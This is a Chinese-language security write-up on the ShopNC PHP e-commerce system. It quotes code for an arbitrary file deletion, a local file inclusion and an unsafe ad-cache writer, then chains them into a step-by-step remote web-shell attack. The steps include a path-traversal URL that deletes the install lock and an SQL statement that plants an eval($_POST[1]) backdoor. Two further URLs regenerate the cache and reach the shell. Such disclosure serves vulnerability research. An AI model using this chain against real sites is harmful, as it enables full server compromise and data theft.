电子商务系统ShopNC多个漏洞结合可暴力getshell

前言

ShopNC是一款网城创想公司旗下服务于企业客户的电子商务系统，基于PHP5技术采用MVC 模式开发，本文介绍了shopnc多个漏洞结合,可getshell有点暴力-_-

任意文件删除

文件 control\store.php 1438 行 (还有几个同样的地方,新版已修复)

........
$model_upload = Model('upload');
 $file_info = $model_upload->getOneUpload(intval($_GET['file_id']));
 if(!$file_info){
 @unlink(ATTACH_SLIDE.DS.$_GET['img_src']);
 }else{

........

本地文件包含

文件 /framework/core/base.php 71行

$act_file = realpath( BasePath.DS."control".DS.$_GET['act'].".php" );
 }
 if ( is_file( $act_file ) )
 {
 require( $act_file );
 $class_name = $_GET['act']."Control";
 if ( class_exists( $class_name ) )

后台更新缓存写shell

/**
 * 更新一条广告缓存
 *
 * @param unknown_type $adv
 * @return unknown
 */
 public function makeAdvCache($adv){
 $lang = Language::getLangContent();
 $tmp .= "<?php \r\n";
 $tmp .= "defined('InShopNC') or exit('Access Invalid!'); \r\n";
 if (is_numeric($adv) && $adv > 0){

 $condition['adv_id'] = $adv;
 $adv_info = $this->getList($condition);
 $adv = $adv_info['0'];
 }
 ..................................
 $content = addslashes($v);
 $content = str_replace('$','\$',$content);
 //防止有$符号被解析成变量
 $tmp .= '$'.$k." = \"".$content."\"; \r\n";
 }
 //缓存文件存放位置及文件名
 $cache_file = BasePath.'/cache/adv/adv_'.$adv['adv_id'].'.cache.php';
 file_put_contents($cache_file,$tmp);

继续跟进getList函数

public function getList($condition=array(), $page='', $limit='', $orderby=''){
 $param = array();
 $param['table'] = 'adv';
 $param['field'] = $condition['field']?$condition['field']:'*';
 $param['where'] = $this->getCondition($condition);
 if($orderby == ''){
 $param['order'] = 'slide_sort, adv_id desc';
 }else{
 $param['order'] = $orderby;
 }
 $param['limit'] = $limit;
 return Db::select($param,$page);
}

写文件时,从数据库中遍历key,跟value 未过滤key,key 可以从数据库读取,当有数据库可控时,即可写入任意文件.

ShopNc GetShell

结合以上三个漏洞,即可优雅的 getshell

流程

任意文件删除 => 重装 => 更改数据库 shopnc_adv 键值 =>更新广告缓存 =>getshell

具体步骤

1:http://www.xxx.com/index.php?act=store&op=dorp_img&file_id=16&img_src=/../../../install/lock

2:重装系统

3:进入MySQL 执行sql ALTER TABLE `shopnc_adv` ADD `{eval($_POST[1])}` VARCHAR( 100 ) NOT NULL

4:进入后台 更新广告缓存 http://www.xxx.com/admin/index.php?act=adv&op=adv_edit&adv_id=14

5:连接shell http://www.xxx.com/index.php?act=../cache/adv/adv_14.cache